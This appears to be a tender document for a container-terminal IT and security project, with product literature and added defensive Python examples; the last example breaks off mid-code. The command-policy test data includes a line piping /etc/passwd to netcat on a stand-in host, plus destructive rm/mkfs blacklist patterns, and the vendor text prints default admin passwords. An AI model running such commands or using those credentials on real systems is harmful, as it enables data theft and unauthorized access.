As a detection and analysis platform, the Security Awareness System also provides security analysts with a professional incident analysis aid, Latent Threat Goldeneye, which provides fast query services based on IP addresses. Analysts only need to enter the IP address to be analyzed, and the Goldeneye platform, drawing on the background big data analysis and correlation retrieval capabilities, provides IP-centric security threat analysis, including:


You can mine assets and business flows associated with specific IPs through automatic correlation analysis, and mine and analyze violations, abnormal behaviors and suspicious attacks;


Provides a tree-like business access and attack process relational network based on query IPs as root nodes;


Based on any node in the relational network, double-click to quickly drill down and analyze, digging deeper into the traces of the attack process, and intuitively understanding the causes and consequences of the entire security incident;


Correlated display of the original logs: the logs related to specific nodes and access paths can be viewed at any time as needed, making it convenient for analysts to locate and analyze security issues.


Server Installation Program


1. Preparation of equipment list: Before starting the construction, it is necessary to prepare servers, racks, network switches, power supply equipment, network cabling materials, cable management components and so on.


Prepare tools and installation accessories.


Install a protective ground wire to ensure that the chassis ground is connected directly to the server room grounding strip or cabinet grounding point.


Install the network cables and ensure that connectivity is tested with a network cable tester before tying the cables.


Install fiber optics and ensure that the fiber optics and fiber optic patch cords meet the requirements before use.


Install the cables on the router, making sure that the cables are routed along the chassis' cable runners, plugged into the connectors on the daughter card and tighten the anti-dislodgement screws with a Phillips screwdriver.


Pre-power-up inspection, including cabinet electrical connection check, installation environment check, and cabinet installation check.


Power-up check: ensure that the input voltage is within the normal range before powering up the device.


2. Network Configuration: Pay special attention to the setting of network parameters such as IP address, subnet mask, default gateway and DNS service. At the same time, consider the network security configuration of the server, such as firewall rules and VPN settings.


Complete the installation and configuration of the operating system, including network configuration, administrator account setup, and security settings.


Install the necessary patches and drivers to keep the server running properly.


Configure the switch, including VLAN segmentation, STP configuration, and so on.


Configure network security devices, including security policies, firewall rules, etc.


Perform system testing to ensure that all equipment is functioning properly and network connections are stable.


3. Server monitoring and management: Choose appropriate monitoring tools and techniques, such as system log analysis, performance metrics monitoring, and anomaly detection.


4. Security measures: use strong password policies, restrict unnecessary service ports, configure security updates and patch management, and implement access control policies.


Precautions


Power Requirements: Use a power supply that meets safe voltage requirements, and check that the power supply is correct before operating the equipment.


Environmental requirements: avoid installing the equipment in direct sunlight or near heat sources; keep the equipment level and leave enough space around it for air circulation and heat dissipation.


Working environment: Pay attention to environmental factors such as temperature, humidity and altitude.


Cable requirements: cables should follow the direction of the existing cable runs, be installed alongside them and be fixed with cable ties, so that the wiring is neat and concealed.


Routine maintenance: do not expose the product to working conditions other than those specified in the user manual, and prevent the equipment from being dropped or subjected to strong impacts.


Wireless Vehicle Mount Terminal Installation Program


Solutions for installation on port container trucks, RTGs and QCs


1. Determine the location: choose a suitable installation location on the vehicle; the front of the vehicle is generally recommended so that the antenna faces the sky directly and receives signals better.


QC/RTG/RMG installation solution: Add a universal joint between the bracket and the terminal to adjust the angle and extend the terminal outward.


VMT Installation Program


2. Mounting the antenna: Place the antenna on top of the vehicle and secure it with tape or screws. Make sure the antenna is centered and does not overlap vehicle seams or other obstacles.


3. Installing the equipment: choose a suitable location inside the vehicle, generally the windshield or the in-vehicle equipment bracket area, while avoiding the driver's operating area.


4. Connecting the power supply: Before connecting the power supply, please be sure to read the instruction manual of the vehicle-mounted terminal carefully and follow the instructions.


Precautions


1. Power supply: Strictly observe the electrical safety regulations of the place of use. Please use a power supply that meets the safety voltage requirements, and check whether the power supply is correct before the equipment is operated.


2. Use of environmental requirements: Do not install the equipment in places such as humid, dusty, extremely hot, extremely cold or strong electromagnetic interference.


3. Cable requirements: Wireless network antennas and positioning antennas must be installed where the signal is good, with attention to lightning protection, and must not be covered or blocked by any object.


4. Routine maintenance: If the equipment is not working properly, contact the manufacturer or the nearest service center. Do not disassemble or modify the equipment in any way at will.


Training programs


Technical training program for personnel


For our company, if the project's management personnel master the CTOS supporting equipment, maintenance pressure in the later stage is reduced accordingly, and the design concept and the result of the engineering construction are fully realized.


Training consists of two parts: course training and on-site operation training (covering software and equipment). All training is provided free of charge. We will develop a systematic and detailed training program to ensure that Party A gains a comprehensive and systematic mastery of the entire CTOS supporting equipment system and can operate it correctly and safely and maintain it effectively.


On-site training: aimed at system operators; it covers product use, system optimization, common fault diagnosis and troubleshooting, and routine maintenance of each system.


Certified training: covers installation, commissioning, configuration and optimization of the product to achieve proficiency, including performance tuning, configuring performance parameters, and diagnosing the corresponding faults.


Training Materials and Faculty


We will provide training materials and relevant technical information to the staff receiving training, before the training starts. The materials include equipment operation manuals, maintenance manuals, user guides for each system, software maintenance manuals and other necessary technical information. All technical materials will be provided in English. All training materials remain our property and are submitted in a format (e.g., Word, Excel) and form approved by us that can be easily reproduced.


Our company guarantees that the instructors dispatched for the training courses are senior engineers with sufficient technical knowledge and experience, holding the engineer certifications for the corresponding products. They will be involved in the design and installation of the project. Their names and positions will be submitted to Party A for approval along with the training program.


Training Venue and Facilities


Both course training and on-site operation training will be arranged on site. Party A will provide the necessary basic training facilities, such as the training room, blackboard, power supply and podium; the projector and other instruments and equipment needed for training will be prepared by us.


Training content


No.   System name

1     CTOS server system

2     CTOS supporting software system

3     CTOS supporting terminal system

4     CTOS network system

5     CTOS information security system


Training Arrangements


Preparation


To organize the training scientifically, understanding the current situation of the users is a necessary preparation. For this purpose our company asks the customer to fill in a questionnaire on the basic situation of the training participants. The questionnaire is used as the basis for the training curriculum and class schedule.


Questionnaire fields: Name; Age; Education attainment; Specialized field; Duties; Job; Training level.


Scheduled training time: specifically according to Party A's requirements.


Trainees


We will train a number of Party A's technicians free of charge. The personnel can be designated according to Party A's requirements.


Classes are scheduled for two classes in the morning and two classes in the afternoon, with breaks in between according to the actual training situation. The total training time is 10 days.


Training Programs


No.   System name

1     CTOS server system

2     CTOS supporting software system

3     CTOS supporting terminal system

4     CTOS network system

5     CTOS information security system


Training organization, implementation and management


Based on the developed and approved training plan, a specific implementation plan is formulated, including the names and units of the trainees, the training materials to be used, the lecturers, and the lecture venues.


Training Lecturers


The training instructors sent by us have both long-term experience in system design, operation and maintenance, as well as rich experience in training and counseling.


Training Commitment


1) Free training for Party A's engineers and technicians and management personnel on technologies related to the project.


2) Independent training is conducted for each system involved in this project, and a "training record" is completed for each training session.


3) The number of on-site trainees is not limited; the timing is determined according to Party A's requirements and actual needs.


4) The number of on-site training sessions is not limited; they are arranged according to Party A's requirements.


Training materials


Prior to the commencement of the training, we provide Party A with all training materials in English free of charge, including:


1) System design solution.


2) Systematic training materials.


3) Product manuals for the products used in the system.


4) System Operation Manual.


5) System Maintenance Manual.


Training Methods


1) Multimedia teaching is used; the training equipment includes a projector, a physical display table and so on, accompanied by the necessary practical exercises.


2) The teaching method combines basic theory with practical operation, and centralized lectures with individual coaching.


3) Teaching aids and equipment: the teaching materials are mainly the manuals supplied with the products and software together with the corresponding operation documents; the teaching venue is the project implementation site; the teaching equipment may be any of the equipment integrated into the system.


4) Management of the training process: to strengthen management and improve the quality of the training, participants follow the guidance of the training instructors, and the management of the information department gives the instructors sufficient authority to ensure that the daily teaching content is delivered.

Tender Documents Page 26 of 33


After-sales Service Programs


I. Project after-sales service content commitment


The company follows the principles of "honesty and integrity, customer achievement, self-improvement, pursuit of excellence", provides quality-tracking services for projects that have been completed and accepted, and, in the spirit of technical excellence, delivers first-class technology and first-class maintenance services to users.


If the company is awarded the project, it will strictly follow the provisions of the bid and the contract in fulfilling its responsibilities and obligations for this project during the warranty period. After the warranty period, to ensure continuity of equipment maintenance, the owner is advised to sign a maintenance contract with the company to secure the technical and management support necessary for the normal operation of this system.


The overall warranty for this project is 1 year, and the server meets the 3-year global warranty.


II. After-sales service period


On the date of acceptance of the project, the after-sales service period is entered.


After-sales service period = quality assurance period + quality maintenance period


Quality guarantee period: During the quality guarantee period, if the failure is caused by quality problems, free replacement of equipment, components and materials will be implemented. If the failure is caused by non-quality factors, the cost of replacement equipment, components and materials will be charged.


Quality maintenance period: after the quality guarantee period ends, the quality maintenance period begins automatically.


The company undertaking the project will supply the required replacement components and materials at a preferential price not higher than the unit price of the equipment in this contract; the cost of maintenance personnel is charged in addition.


III. Services and warranty period


On the date of acceptance of the project, the after-sales service work will start, including the following aspects:


1. Maintenance staff;


2. After-sales service period;


3. Service response time;


4. After-sales service programs.


IV. Commitment to concrete measures


1. When the project contract is signed, an after-sales service guarantee agreement is signed with the customer at the same time, to remove the customer's concerns and to make a realistic and objective commitment to the customer.


2. After the project has been accepted and delivered to the user, we keep in contact with the user during the contract period, record how the user operates the system and how the system runs (quality tracking survey), and change passive service into active service.


3. Establish system operation files for projects that have been handed over and carry out quality tracking.


4. The system operation file records the operation of the project, the use of each type of equipment, the skill level of the operators and personnel changes.


5. For representative problems encountered by the operators of each user unit, we conduct technical training for the operators or go to the site for training and guidance on a regular basis.


6. When equipment in a system in use fails, our maintenance service personnel go to the site promptly after receiving the report to handle and repair it.


7. For projects that have been in operation for a long time, our maintenance service personnel contact the customer regularly to ask about the situation, carry out regular inspections at the customer's site, and keep records, which are filed and preserved.


8. Construction Assurance


Technicians with rich experience will be selected to be responsible for the specific construction of the project to ensure the quality of the installation and the use of the system function, and to ensure that the whole system runs smoothly, efficiently and reliably.


9. System warranty


As the project contractor, we will strictly follow the provisions of the bidding documents and the contract and provide the owner with free maintenance during the warranty period, counted from the date of final acceptance of the project.


10. If equipment is damaged during the warranty period and the failure is identified as caused by the equipment itself, we are responsible for free repair or replacement; during the warranty period we are also responsible for providing regular maintenance and repair services for the equipment.


In short, so that the owners can use the system with confidence and ease and the project operates normally, the company's entire technical and maintenance staff follow the principle of customer first, act wholeheartedly in the customer's interest and go all out in their work; let us work together to create a better tomorrow.


V. System maintenance


1. System operation and management


In order to ensure that the system can operate normally for a long time, we will carry out perfect system training, and at the same time develop the operating procedures of each system project, and cooperate with the owner to develop the operator's responsibility interface and reasonable handover system.


2. System maintenance


Our after-sales service personnel will service your system items during the maintenance period to keep them in good operating condition.


3. Monthly maintenance


Adherence to monthly maintenance ensures that each system project's mechanical devices are kept in optimal working condition.


VI. Content and scope of warranty services


The Company will provide a warranty for each project undertaken, valid from the date of acceptance of the project and the Owner's signature on the completion report.


1. Response time: The specific response time will be divided by fault level;


2. Maintenance location: user site.


Our company is responsible for the implementation of all system projects. For failures that occur under normal environmental conditions and appropriate use, our company will provide the agreed warranty services. For failures not covered by the warranty, our company will arrange to provide the service, but it will be charged separately according to the fee schedule.


Our warranty service is limited to products that are qualified by us. Non-conforming products include products not supplied by us, products not recognized as conforming by us, and products for which the customer does not allow us to make functional improvements.


System damage that occurs under the following conditions is not covered by warranty service:


a. Damage to system equipment caused by the use of inappropriate tools for system maintenance;


b. The site environment does not comply with the specifications recommended by our company;


c. Accidents, natural disasters, negligence and misuse, war, strikes, lightning strikes or power failures, damages caused by improper handling by the customer, modifications and changes made to the system by persons other than our personnel or their authorized subcontractors;


d. Damage arising from the way the customer maintains the equipment or processes information.


VII. Maintenance and service support measures


1. On-site troubleshooting or technical guidance


After receiving the owner's telephone support service request, if we can not solve the technical faults of the equipment or products through telephone support service, and if the need for on-site support is confirmed by both parties, we will send professional project technicians to the site in time to assist the owner to solve the faults.


2. Telephone support services


The telephone helpline numbers (telephone and fax) are those provided by us to the Owner. If they change, we shall notify the Owner by e-mail, fax or telephone no later than 3 days from the date of change.


3. Complaint handling services


There is a telephone number for customer complaints in the company.


4. Telephone counseling services


We provide telephone consulting services for non-faulty problems arising from the owner's use of the equipment or products.


Setting up quality pre-sale and after-sale services in engineering projects to maximize the satisfaction of customers' needs and expectations is one of the important management tools for an enterprise to achieve long-term stable development in many industries.


Technical Literature


CTOS server(C6620)




CTOS access switch (S5731-S48T4X)


RDT Handheld (CK65)




RTG/RMG Terminal (8312)


VMT (4108)




Operations and maintenance audit system (DAS-USM280)

Product Introduction

DAS-USM is a unified security management and audit product (a bastion host), available in a hardware version and a cloud version. The functions of the two versions are basically the same, and users can purchase whichever suits their needs. The product integrates authentication, account management, authorization and audit. It supports security monitoring and historical query of multiple character-terminal protocols, file transfer protocols, graphical terminal protocols and remote application protocols. It provides comprehensive operation and maintenance risk control and meets the operation and maintenance audit requirements of various laws, regulations and standards (such as classified protection (MLPS), SOX, PCI, enterprise internal control and ISO/IEC 27001).

The main functions of DAS-USM are as follows.

Authentication and Authorization

Two-factor authentication: Built-in mobile app authentication (Google Authenticator-style dynamic passwords, i.e. time-based one-time passwords), OTP dynamic token and USB key two-factor authentication engines. Provides interfaces for SMS, AD, LDAP and RADIUS authentication. Different authentication methods can be combined.

Authority management: The system presets several user roles: super administrator, department administrator, operation and maintenance administrator, audit administrator, operation and maintenance personnel, auditor, system administrator and password administrator. Each role has different permissions.

Centralized authorization: Maps the relationships between users and hosts, with flexible authorization modes: one-to-one, one-to-many, many-to-one and many-to-many.

Single sign-on: Host accounts and passwords are held by the system. Operation and maintenance personnel log in to the target host automatically by clicking <Login>, without entering the host's account and password.

Self-learning: After operation and maintenance personnel log in to a target host through DAS-USM successfully, the host information is recorded automatically, reducing the administrator's work of configuring host information and user-host relationships.

Operation and Maintenance & Audit

Protocol support: Manages Linux/Unix servers, Windows servers, network devices (Cisco/H3C/Huawei, etc.), file servers, web systems, database servers, virtual servers, remote management servers, etc. Compatible with client tools such as Xshell, Xftp, SecureCRT, MSTSC, VNC Viewer, PuTTY, WinSCP, FlashFXP, SecureFX and OpenSSH.

Unified audit: Records all operations in detail and provides comprehensive queries. Audit logs can be played back online or offline and are backed up and archived automatically. The audit content includes graphics, characters, files, applications, SQL statements and application sessions.

Browser-based operation and maintenance: Implemented with HTML5, so the operation and maintenance interface opens in a browser without installing local tools. Supports SSH, Telnet, Rlogin, RDP and VNC through the web client.

File transfer audit: Records all operation sessions, including online monitoring, real-time blocking, log playback, start and end time, source user, source IP, target device, protocol/application type, command record and operation content. Keeps a complete backup of transferred files as the basis for investigating dangerous behavior such as uploading malicious files, dumping databases and stealing data.

Automated operation and maintenance: Runs automated operation and maintenance tasks and informs the relevant personnel of the results.

Asset management: Supported asset types include host, host group, AWcloud, account, account group, application and others.

Command control: Centralized command control applies different command control policies per host and per user, including command blocking, command blacklists, command whitelists and command auditing.

Ticket process: The operator applies to the administrator for access to a device, specifying the device IP, device account, validity period of the operation and maintenance window, remarks, etc.; the ticket is sent to the administrator by e-mail.

Other

System self-check: Audits changes to the system and produces a system analysis report.

Product linkage: With the database audit system of the same brand, database operations performed over encrypted channels such as SSH/RDP are merged into the database audit, giving unified centralized query, display and audit analysis of database behavior.

Redundant structure: Combines port aggregation, RAID and HA technologies into a triple-redundant high-availability structure.

API interface: Provides APIs for adding, deleting, modifying and querying users, assets and authorizations, allowing third-party platforms to synchronize users, assets and permissions automatically.
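The command control function above (per-host, per-user blacklist, whitelist and audit policies) is the part of a bastion host that decides, before forwarding a line typed into an SSH session, whether to forward it, block it or just record it. The following is an added example of that decision logic; it is not DAS-USM's implementation, and the policy format, host names, user names and regular expressions are assumptions for illustration. It goes slightly beyond the text by splitting compound command lines with shell quoting rules, so that `ls; rm -rf /` or `r"m" -rf /` is judged on each sub-command rather than on the first word only:

```python
# Added example (not DAS-USM code): evaluating a per-user/per-host command
# control policy (blacklist, whitelist, audit-only) against a command line
# typed in an SSH session, the way a bastion host does before forwarding it.
import re
import shlex
from dataclasses import dataclass
from typing import List, Tuple

SEPARATORS = {";", "&&", "||", "|", "&", "(", ")"}


@dataclass
class CommandPolicy:
    user: str            # user name, or "*" for any user
    host: str            # host name, or "*" for any host
    mode: str            # "blacklist": block on match; "whitelist": block unless matched; "audit": never block
    patterns: List[str]  # regexes applied to each normalized sub-command


def split_subcommands(cmdline: str) -> List[str]:
    """Split 'a; b | c' into ['a', 'b', 'c'] using shell quoting rules, so that
    quoting tricks such as r"m" -rf / or ls;rm are normalized before matching."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    parts, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                parts.append(" ".join(current))
            current = []
        else:
            current.append(token)
    if current:
        parts.append(" ".join(current))
    return parts


def evaluate(policies: List[CommandPolicy], user: str, host: str, cmdline: str) -> Tuple[str, str]:
    """Return (decision, reason); decision is 'allow', 'block' or 'audit'.

    The first policy whose user and host selectors match is applied; with no
    matching policy the command is forwarded but flagged for audit."""
    policy = next((p for p in policies
                   if p.user in ("*", user) and p.host in ("*", host)), None)
    if policy is None:
        return "audit", "no policy for %s@%s; session recorded only" % (user, host)

    for sub in split_subcommands(cmdline):
        matched = any(re.search(pat, sub) for pat in policy.patterns)
        if policy.mode == "blacklist" and matched:
            return "block", "blacklisted command: %r" % sub
        if policy.mode == "whitelist" and not matched:
            return "block", "not on whitelist: %r" % sub
    if policy.mode == "audit":
        return "audit", "audit-only policy"
    return "allow", "permitted by %s policy" % policy.mode


# Constructed sample policies (assumed host and user names)
POLICIES = [
    CommandPolicy("dba", "db01", "blacklist",
                  [r"^rm\s+(-\S+\s+)*/\s*$", r"^(shutdown|reboot|halt|mkfs\S*)\b", r"^dd\b"]),
    CommandPolicy("operator", "*", "whitelist",
                  [r"^(ls|cat|tail|grep|df|free|uptime)\b"]),
    CommandPolicy("*", "*", "audit", []),
]

if __name__ == "__main__":
    for user, host, cmd in [
        ("dba", "db01", "ls -l /data"),
        ("dba", "db01", 'cd /tmp; r"m" -rf /'),
        ("operator", "web01", "tail -n 50 /var/log/nginx/access.log | grep 500"),
        ("operator", "web01", "cat /etc/passwd | nc 203.0.113.9 4444"),
        ("auditor", "web01", "whoami"),
    ]:
        print(user, host, repr(cmd), "->", evaluate(POLICIES, user, host, cmd))
```

A whitelist is the safer default for operators with narrow duties, because a blacklist can only name the dangerous commands you thought of; note that command-level control still cannot see inside interactive programs (an editor or a database shell) once they are running, which is why the session recording and file-transfer audit above remain necessary.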

Typical Application Scenarios

DAS-USM is deployed out of path (bypass mode) on the core switch. Operators then connect to the assets for secure operation and maintenance with their local terminal tools (over SSH, Telnet, FTP, RDP, VNC, Oracle, DB2, MySQL, SQL Server and other operation protocols), with every session passing through DAS-USM. Network-level configuration (for example policy routing or ACL policies) restricts operators to reaching Linux and Windows hosts only through DAS-USM, so that DAS-USM can audit all operator activity. Because the enforcement point is the network policy rather than the hosts themselves, any path that bypasses those ACLs (a second interface, a VPN, a misconfigured switch port) also bypasses the audit, so the ACLs should be verified after deployment and direct logins on the hosts monitored.
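One way to check that the network-level restriction in the scenario above actually holds is to look, on the managed hosts, for successful logins whose source is not the bastion. The following is an added example of that detection over sshd log lines, not a DAS-USM feature; the bastion address, the allowed backup network and the log lines are constructed for illustration:

```python
# Added example (not DAS-USM code): checking sshd authentication logs for
# interactive logins that did not come through the bastion host, i.e. a gap
# in the policy-routing/ACL enforcement the deployment relies on.
import ipaddress
import re
from collections import defaultdict

# Assumed address of the DAS-USM bastion; sessions it relays arrive from here.
BASTION_ADDRS = ["10.10.0.5"]

SSHD_ACCEPT = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]+)\s(?P<host>\S+)\ssshd\[\d+\]:\s"
    r"Accepted\s(?P<method>\S+)\sfor\s(?P<user>\S+)\sfrom\s(?P<src>\S+)\sport\s(?P<port>\d+)"
)


def find_bastion_bypass(lines, bastion_addrs=BASTION_ADDRS, allow_nets=()):
    """Return (user, host, src, ts) for each successful login whose source is
    neither the bastion nor an explicitly allowed network (e.g. backup servers
    that legitimately log in directly)."""
    bastion = {ipaddress.ip_address(a) for a in bastion_addrs}
    allowed = [ipaddress.ip_network(n) for n in allow_nets]
    findings = []
    for line in lines:
        m = SSHD_ACCEPT.match(line)
        if not m:
            continue  # failed logins, disconnects etc. are not relevant here
        src = ipaddress.ip_address(m["src"])
        if src in bastion or any(src in n for n in allowed):
            continue
        findings.append((m["user"], m["host"], str(src), m["ts"]))
    return findings


def summarize(findings):
    """Count direct logins per (source, user) to spot habitual bypassers."""
    counts = defaultdict(int)
    for user, _host, src, _ts in findings:
        counts[(src, user)] += 1
    return dict(counts)


# Constructed sample log lines in syslog/sshd format (not real data)
SAMPLE_LOG = """\
Oct 28 09:12:01 db01 sshd[2211]: Accepted publickey for dba from 10.10.0.5 port 51022 ssh2: RSA SHA256:abc
Oct 28 09:15:44 db01 sshd[2290]: Accepted password for dba from 10.20.3.17 port 60123 ssh2
Oct 28 09:16:02 web01 sshd[812]: Failed password for root from 203.0.113.9 port 40111 ssh2
Oct 28 09:20:18 web01 sshd[830]: Accepted publickey for operator from 10.10.0.5 port 51100 ssh2
Oct 28 10:02:51 web01 sshd[901]: Accepted password for operator from 10.20.3.17 port 60200 ssh2
Oct 28 10:05:00 web01 sshd[902]: Accepted publickey for backup from 10.30.1.2 port 44000 ssh2
""".splitlines()

if __name__ == "__main__":
    hits = find_bastion_bypass(SAMPLE_LOG, allow_nets=["10.30.1.0/24"])
    for user, host, src, ts in hits:
        print("%s direct login %s@%s from %s" % (ts, user, host, src))
    print(summarize(hits))
```

Every direct login found this way is a session that DAS-USM never recorded; the same check applies to Windows hosts using logon events with a network source address. A stronger complement is to make the hosts enforce the rule themselves, for example by allowing SSH only from the bastion address in sshd or the host firewall, so that the audit does not depend solely on switch ACLs.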

Role & Permission

There are 9 different roles built into the system by default, and users can also define custom roles through the role management function. The product manual's permission table ("√" means supported and "-" means not supported) covers the following built-in roles and permission items; the operations in this document are illustrated using the Super Administrator.

Roles: Super Administrator; Department Administrator; Operation Administrator; Password Administrator; Audit Administrator; Operator; Auditor; System Administrator.

Permission items: Department Management; Security Code Management; User Management; User Group Management; DKEY TPASS; USBKEY Management; Asset Management; Authorization Management (operation rules approval, ticket approval); Session Audit (for one role, limited to sessions covered by its audit rules); Audit Plan Management; Host Operation; Real-time Monitoring; Task Plan; System Management.

Login to Device

The super administrator needs to log in to the device for function configuration after the device is installed in the rack and connected to the network and power supply. DAS-USM can be configured through the CLI or the web interface and supports both local and remote configuration. The CLI is reachable via the console port, Telnet and SSH. Telnet carries the administrator's credentials in cleartext, so use the console port or SSH for CLI management and disable Telnet where the network design allows.

The cloud version only supports web configuration.

Configurate by CLI

Please refer to the following steps to set up the DAS-USM console port configuration environment:

Use your own configuration cable and connect its USB plug to a USB port on the PC.

Connect the RJ-45 plug of the configuration cable to the console port of the device.

Run a terminal emulation program (such as PuTTY or SecureCRT) on the PC and set the serial parameters as shown in the table below.

Parameter            Value

Baud rate            115200 bit/s

Data bits            8

Parity check         None

Stop bits            1

Data flow control    None

Turn on the power switch; the device performs a self-test and automatic initialization. If the system starts successfully, a login prompt is displayed.

Enter the default user name at the login prompt and press Enter, then enter the default password and press Enter to access the CLI configuration interface.

Default user name: coreshell; default password: sysAdm@169+-. Change this default password at first login: it is printed in the vendor documentation and is therefore known to anyone who can reach the console port or a Telnet/SSH management interface.

Configurate by Web

This section uses the hardware version as an example. For the cloud version, ensure that the PC can reach the DAS-USM by routing.

The administrator can log in to the web management platform of the device for configuration. The specific methods are as follows:

S1 Set the PC's IP address to an unused address in the 172.16.1.0/24 segment, the same segment as the device's default management address 172.16.1.2/24 (the PC must not use 172.16.1.2 itself), and connect the PC's Ethernet interface to the device's management interface with a network cable.

S2 Enter "https://172.16.1.2" in the address bar of the PC browser (Chrome 69 or later, or IE 11 or later, is recommended) and press Enter to open the login page of the web management platform.

S3 Enter the default user name and password, then click <Login> to enter the main interface of the device's web management platform.

The default management address is 172.16.1.2/24; the default administrator user name is admin and the password is sysAdm@169+-. Change the password after the first login.

Main Business Process

The main business process of the system is as follows.

Create department: the super administrator or department administrator creates a department. Please refer to 4.1 Create Department for details.

Create users: create system users, including operation and maintenance personnel. Please refer to 5.1.1 Create User for details.

Create host: the system can audit operations on a host after the host has been added to the system. See 6.1 Host Management for details.

Create operation and maintenance rules: authorize operators to log in to hosts for operation and maintenance. Please refer to 7.1 Operation and Maintenance Rules for details.

Operator maintains the host: the operator logs in to the host through the system and maintains it. Please refer to 10.1 Host Operation for details.

Auditors audit the host operations: the auditors audit the sessions. Please refer to 8.1 Session Audit for details.

Operation video data archiving configuration: archive session recordings. Please refer to 12.5.1 Data Archiving for details.




Network Security Situational Awareness Platform (SIP-1000-B3400-SR+STA-100-B2300-SR)


WAF Firewall (WAF-2000-FH2150A-SR)

Introduction

Sangfor Network Secure is endowed with the capabilities of risk prediction, deep security protection, and detection response, forming an integrated security system with whole-process protection and visibility.

Fusion is not a simple superposition of functions but the integration of the technical security measures needed for the risks encountered during service development, so that the service is protected throughout its life cycle. Fusion security covers pre-event asset risk identification and policy effectiveness detection, the security defenses required during an event, and post-event continuous detection and rapid response; all information from this process is presented to users in different ways.

Key Features

I. Preparation & Prediction: Asset/Vulnerability/Policy Effectiveness

Network Secure can automatically identify risks such as open ports, vulnerabilities, and weak passwords on internal servers in advance, and can judge whether the identified assets have corresponding security protection policies and whether the policies are effective.

II. Real-Time Defense: Complete Defense System + Security Correlation + Threat Intelligence

Network Secure integrates a number of security technologies for effective defense during an event. It provides a complete security defense system (L2-L7) to ensure that there are no weaknesses in security protection. At the same time, Network Secure can also improve the timeliness and effectiveness of the defense system through security integration, including the integration of cloud and endpoint security solutions, and the coordination of different modules. In addition, Network Secure also cooperates with third-party security agencies, and utilizes threat intelligence from multiple sources, such as the Chinese National Vulnerability Database, VirusTotal, and malicious URL databases to help users prepare for defense before security events occur.

III. Post-event Detection & Response: Continuous Detection of Threatening Behaviors and Rapid Response

Traditional security work focuses mainly on perimeter defense and lacks the ability to detect and respond once attackers bypass those defenses. Mature post-event detection and response measures greatly reduce the impact of security events. Network Secure integrates post-event detection and rapid response technologies that help users discover malicious behavior promptly even after a compromise, such as activity initiated by bot-infected computers, web page tampering, hidden-link embedding and Webshell backdoors, and pushes alarm events quickly to assist users in response and handling.


Load balancing equipment (AD-1000-B1800-SR)


Firewall (USG6615F)


Business system core switch (S12700E-4)


Construction schedule planning


Project plan for the installation and deployment of equipment in the server room (45 days)


Project Overview


This project covers the rack installation, deployment and joint commissioning in the server room of 26 DLT-V8312 and 35 DLT-V4108 wireless vehicle mount terminals, 2 servers, 6 switches and other equipment. The project period is 45 days, within which the installation and commissioning of all equipment must be completed and normal operation of the system ensured.


Project Objectives


Equipment Installation:Complete physical installation of all equipment as scheduled to ensure equipment is properly located and wiring is standardized.


Device Deployment: Complete the system configuration of the devices, including IP address assignment, routing configuration, firewall configuration, and so on.


Joint Commissioning Test: Joint commissioning of all devices to ensure network interoperability and normal system functions.


System Acceptance:Organize the relevant personnel to carry out the system acceptance, to ensure that the system meets the design requirements.


ConstructionScope


Device Scope:Includes all listed on-board terminals, servers, switches, operation and maintenance audits, load balancing, core switches, access switches, firewalls, network security situational awareness platform.


Scope of Work: Includes handling, installation, commissioning, configuration, joint commissioning, testing and acceptance of the equipment.


Site Scope:Primary and backup server rooms and equipment installation areas.


Project schedule


Project resources


Personnel:


Project Manager: Responsible for the planning, implementation and monitoring of the entire project, coordinating the resources of all parties to ensure that the project is completed on time and achieves the expected results.


Equipment Engineer: Responsible for equipment selection, configuration and commissioning, ensuring the compatibility and performance optimization of the wireless vehicle-mounted terminals (VMT) with the servers in the server room.


Network Engineer: Responsible for network architecture design and implementation, ensuring the stability and security of network connections, configuring equipment such as routers, switches and firewalls.


Test Engineer: Responsible for comprehensive testing of the system, including functional testing, performance testing and security testing, to ensure the stability and reliability of the system.


Operation and maintenance personnel: responsible for the daily maintenance and monitoring of the project after going online, dealing with unexpected failures to ensure the normal operation of the system.


Equipment:


Wireless vehicle-mounted terminals (VMT): main devices for wireless data transmission and control.


Server room servers: core equipment that carries data processing and storage, ensuring data security and reliability.


Network equipment: network security equipment, access switches, core switches, firewalls, load balancing, security operation and maintenance audit, network situational awareness, etc.


Installation tools


Network testing tools (e.g., cable tester), installation tools (e.g., drill, wrench), server monitoring software.


Risk management


In the installation project for the wireless vehicle-mounted terminals (VMT) and the server room servers, one of the keys to smooth progress is preventing potential failures and responding quickly. First, to address equipment failure, the project team must hold all types of spare parts, including wireless modules, power adapters and network cables, to deal with possible equipment faults. Equipment inevitably suffers wear or technical failure over a long period, so regular equipment inspections are necessary. Inspections should cover indicators such as equipment operating status, connection stability and temperature monitoring; through these measures hidden problems can be detected and resolved early, reducing the impact of equipment failure on the project schedule. In addition, a contingency plan is in place so that when equipment problems occur, replacement parts can be located and fitted quickly to minimize downtime and keep the project moving forward.


Second, schedule delays are also an important risk factor in project management. To address this, the project team should develop a detailed schedule that breaks the project tasks into small, concrete, executable steps with a clear timeline for each step. The schedule should include milestones for each phase so that the team completes its work within the specified time. At the same time, strengthening communication and coordination is crucial. The project manager organizes regular progress meetings, inviting all relevant personnel to discuss progress, problems and solutions; through this mechanism team members keep abreast of the overall progress and can coordinate quickly when problems arise, avoiding delays caused by poor information flow. Project management tools allow progress to be tracked in real time, so that each task is carried out according to plan and adjustments are made when necessary to complete the project within the scheduled time.


Finally, network failures may seriously affect the operation of the whole system, so establishing a comprehensive network monitoring system is very important. The project team should set up network monitoring tools to monitor network traffic, latency, packet loss rate and other key indicators in real time, so that network anomalies are discovered promptly. With such monitoring in place, the root cause of a failure can be identified quickly, allowing the technical team to take rapid corrective action and avoid the interruption of data transmission or business stagnation that a network failure would otherwise cause. At the same time, the team should carry out regular maintenance of network equipment, updating firmware and software so that the equipment runs the latest releases. In addition, a network redundancy design, such as the installation of backup links, allows a quick switch to the backup network when the primary network fails, improving system reliability and stability.
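As an added illustration (not part of the design document and not any vendor's tool), the check below evaluates latency and packet-loss probes for a primary wireless link and a backup link and decides which one should carry traffic. The thresholds, streak lengths and probe samples are all assumed and constructed; the two-sample fault and three-sample recovery streaks are there so that one bad probe does not cause the switch-over to flap.

```python
# Added example, not from the design document: threshold-based link health
# check with hysteresis, run over constructed probe samples for a primary
# wireless link and a backup link. Thresholds and streak lengths are assumed.
LATENCY_MS_MAX = 150.0   # assumed ceiling for a wireless VMT link
LOSS_MAX = 0.05          # assumed ceiling: 5 % packet loss
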